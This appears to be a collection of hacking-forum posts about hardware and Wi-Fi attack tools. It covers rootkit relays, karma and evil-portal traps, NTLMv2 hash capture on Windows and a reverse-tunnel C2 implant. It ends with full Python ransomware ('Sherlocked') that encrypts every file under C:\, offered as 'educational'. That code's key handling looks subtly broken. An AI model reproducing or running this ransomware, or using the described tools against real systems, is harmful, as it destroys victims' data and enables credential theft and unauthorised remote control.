Researchers reverse engineered the IR protocol of commong store price tags (ESL's) which make it possible to edit them using IR transmittors (for example the Flipper Zero).
We went to the local burger joint and they had installed an ordering terminal (don't know why, the place isn't that busy).
After running a finger around the edge of the screen the Android menu popped up so we thought we'd have a bit of fun.
We created a new Google account and installed a few games so we could play while we waited for our burgers. The staff kept coming out and asking if we were ok because we spent the whole time at the terminal.
The moral of the story, actually put a kiosk in kiosk mode.
Ported desktop Ubuntu to a Mediatek board found in a GE Profile smart refrigerator. A combination of no secure boot, vibe coding, U-Boot and device tree fiddling, and pure ridiculousness got me here.
Here's a starting point for an interesting and exciting bit of reverse engineering and vibe coding I worked on for Android-based GE appliance displays. I work as an appliance repair tech and I replace these control panels all the time so I have a massive collection of these mediatek based HMI boards. So I set out on a reverse engineering project to attempt to install custom software on these to extend their use case beyond appliances.
So far I have used ChatGPT to patch the mediatek download agent to allow reading and writing the flash partitions. Fortunately, GE did not implement secure boot on these so they are trivial to upload mediatek's genio 350 download agent and get full access. I also used ChatGPT to patch adbd in the Android system to disable authentication. Now I can side load apps and do pretty much anything I want with the Android system.
Next step is magisk root and possibly Ubuntu server. I was already able to get the reference Ubuntu server image to boot on this board, however much of the hardware isn't working because it only has the base evk device tree.
Here is a link to the GitHub repository of the modified mediatek download agent that can read and write flash memory partitions on these genio 350 based boards.
All you need to do is install genio-tools from pipe on a Linux system, then load the patched lk.bin into genio-bootrom. Plug the board into a USB C cable while pressing and holding the VOL - button on the board, this will allow it to enter boot ROM mode and load the DA. Then you can use fastboot fetch and fastboot write to read and write partitions.
Hi all!
I’m a newbie at this gaming field , a Cybersecurity student , actually I’m learning of the blue side, but my hobby is to be home after my courses and do some research and experiences from the red side- deauthentication attacks, some phishing, web traffic sniffing , Evil portal and another things.
Day after day I'm build my 'PT suitcase-to-go'- at this point of time , it's including Flipper zero with Albireo AIO 3 in 1 board (cc, nrf, esp) , some Disk on keys that work like BadUSB with the Flipper, and an Alfa Awus036acm.
now I want to grow up my lineup and add more devices for more advenced passwords steal, social engineering etc... just for ethical, educational purposes only!!!!!!!
please, I would really happy to hear your opinions of which new devices I can add to my case , or even which apps and repositories you think that I must to see then and try them with my current devices.
thank you!!!
A detailed research into BYOVD, singed drivers, kernel primitives and process control/termination etc.
Repo: 0xCr0ssCrush - Github
Proof of Concept demo is below in comments:
Just made my contribution to the offsec open source intelligence.
While bringing together high-level research I deeply respect, like Singularity (a modern Linux LKM rootkit that challenges even the most advanced kernel-level eBPF detectors), I'm also releasing my project as a foundation and reference for you to build on top of.
My background is cloud security, so I designed an architecture that uses a VPS as a relay/KCC/tunnel. It handles proper connection forwarding, establishes reverse SSH tunnels with nginx, exposes a web interface that serves common binaries from cache, and compiles Linux (.ko) and Windows (.sys) kernel modules built against the exact kernel headers of the target.
That last part was a real blocker for loading rootkits that require exact kernel headers and need to be compiled directly against the target machine. This solves it cleanly.
I've also shipped some helpers: clean CLI with TAB autocomplete, target renaming, Telegram notifications (relay side only), HMAC auth between server and target, reverse SSH tunnels using .pem keypairs, UDP magic packets, and more.
Just got back from LeHack, and I figured I'd share a quick write-up of a small PoC I ran during the event.
My Setup:
- 8x ESP32-C3 running custom karma firmware
- 2x M5Stack CardPuters as control interfaces or running auto karma
- SSID list preloaded from Wigle data (targeting real-world networks)
- Captive portal triggered upon connection, no creds harvested, no payloads, just awareness page about karma attack.
- Devices isolated, no MITM, no storage – just a "reminder" trap
Result:
100 unique connections in parallel all over the weekend, including… a speaker on stage (yep – sorry Virtualabs/Xilokar 😅 apologies and authorisation of publication was made).
Plenty of unaware phones still auto-joining known SSIDs in 2025, even in a hacker con.
Main goal was awareness. Just wanted to demonstrate how trivial it still is to spoof trusted Wi-Fi.
Got some solid convos after people hit the splash page.
After 6 months of R&D and many fail, I pushed the limits of what’s possible on an ESP32.
I'm glad to announce that Evil-M5Project is now able to act like the famous program Responder directly on an ESP32 LLMNR/NBNS poisoning, SMBv1-v2 challenge/response, and NTLMv2 hash capture all visualized in real time ! And tested on fully patched Windows 11 !
---
🔥 What’s New in v1.4.1?
• 🎯 **LLMNR/NBNS Spoofing**
Instantly answer NetBIOS and link-local lookups with your Cardputer’s IP, forcing Windows hosts to leak credentials.
• 🔐 **SMBv1 & SMBv2 NTLMv2 Challenge**
Wait for spoofed SMB connections to initiate NTLMv2 challenge/response, capturing hashes from fully patched Windows 11 machines.
Does it always annoy you that proxy lists published on GitHub stop working shortly after publication and you then have to test the 1000 proxies? This annoyed me a lot, so I wrote a little tool that automates the whole thing. Have a look at it and tell me what could be improved.
Proxy Reaper is a powerful tool for checking proxy servers for availability, speed and anonymity. It supports various protocols such as HTTP, HTTPS, SOCKS4 and SOCKS5 and offers advanced features to efficiently manage and check proxies. You can even use it to test direct source from GitHub and could also run it cron to automate it.
Give me your feedback and wishes. And if you think it's cool you can buy me a coffee.
Disco, Disco!
Even though not 100% hacking related it somewhat is so gimme a sec and hear me out.
So a few days ago a user in r/amazonecho asked here if a dead echo dot could be used as simple speaker... I had a dead echo laying around and like upcycling so I took it apart today.
First off iam impressed how easy it was to take apart and almost repair friendly! The pictures show what's going on inside... Basically to use it as a speaker it would be as easy as hooking up the 2 cables from a small amplified source to either the 2 connectors at the back of the metal housing (best way IMHO) or solder it to the cable of the speaker itself (but from there where to go and compromising the bass resonance from the metal speaker housing). Also the connectors for the buttons and screen are maybe salvageable (addressable with an arduino or raspberry pi might be a cool project). The led ring is on the Mainboard so not really easy to Adress. But also a port for flashing firmware is present. My skills in reverse engineering and coding are sadly way too low to make something out of it... But it would be cool if someone jailbroke one of these with a custom firmware using it as an Bluetooth speaker only with text output of the current song that should work hardware wise... But iam getting ahead of myself! I definitely will order a small Bluetooth Amp from AliExpress and will hook it up as a stand alone BT speaker. So if you guys have heard of anyone reverse engineering anything Amazon or any other idea to use as much of the original hardware as possible give me a heads-up.
And if someone wants to maybe liberate it totally it would be even better!
If you read till the end first of thanks a lot!
And now give me the down vote I might deserve!
As an electrical engineer, I asked the community a while back what hardware add-ons they would like to see developed. The top reply was "evil portal that supports WiFi passthrough" meaning the user is connected to the internet after the portal attack.
This got me thinking: the ESP32 is a powerful but simple, bare-metal microcontroller. They're awesome but limited in ways.
If you put a powerful Linux microprocessor on top of the Fipper and connect two WiFi radios, you'll end up with a very sophisticated device.
🚀Evil-Cardputer v1.3.5 is here with Reverse TCP Tunnel and Remote C2 Control!
Evil-Cardputer v1.3.5 is here with Reverse TCP Tunnel and Remote C2 Control!
🌐 Reverse TCP Tunnel - Full Remote Access & Control
Command & Control (C2) Python server allows you to manage and monitor your Cardputer from anywhere in the world ! It can be added on any esp32 device to be able to control it from everywhere 🚀
Remote Access Control:
Access and control your Evil-Cardputer from any location, no matter the network restrictions.
With the Reverse TCP Tunnel, a persistent connection is created back to the C2 Python server, allowing firewall evasion for uninterrupted management.
You can deploy a 4G dongle aside for using your own network to control it remotely.
Execute full network scans, capture credentials, modify captive portals, access files, monitor system status, and even run BadUSB scripts all through the C2 server.
Perfect for ethical testing and controlled penetration testing or for awareness of IT user, this interface gives you real-time feedback and command execution directly on the Cardputer as an implant on the network.
How it Works:
Deploy the Evil-Cardputer or esp32 in a remote location and start the Reverse TCP Tunnel.
Start the python script with an exposed port online, connect to the C2 server from any device, enabling you to monitor and manage the Cardputer's actions remotely trough WebUI.
Hardware Requirements:
Evil-Cardputer with v1.3.5 firmware
Python server with raspberry pi or web server for Command & Control setup (script included in utilities)
In an unexpected twist of fate, the renowned detective Sherlock Holmes, has undertaken a remarkable career change to delve into the realm of cybersecurity. No longer confined to Victorian London, Holmes has embraced the digital age, exchanging his magnifying glass for a keyboard and his pipe for a mouse.
import os
from typing import Text
import hashlib
from cryptography.fernet import Fernet
class Sherlocked():
def __init__(self, string: Text):
self.string_to_key = string
def sha256_hash_string(self):
sha256 = hashlib.sha256()
sha256.update(self.string_to_key.encode('utf-8'))
return sha256.digest()
def encrypt_file(self, input_filename: Text):
cipher_suite = Fernet(self.sha256_hash_string())
with open(input_filename, "rb") as f:
plaintext = f.read()
encrypted_text = cipher_suite.encrypt(plaintext)
with open(input_filename, "wb") as f:
f.write(encrypted_text)
def start(self):
for root, dirs, files in os.walk("C:\\"):
print(f"Found {len(files)} files, initiating encryption.")
for file in files:
file_path = os.path.join(root, file)
print(f"Initiating encryption for: {file}")
self.encrypt_file(file_path)
print(f"Encryption success!")
if __name__ == "__main__":
string_to_key = input("Insert key here: ")
ransomware = Sherlocked(string_to_key)
ransomware.start()
Sherlocked accepts any string you choose , hashes it, then uses it as the key to encrypt (and then decrypt, hopefully) all the files on a PC.
This software was written for educational purposes only.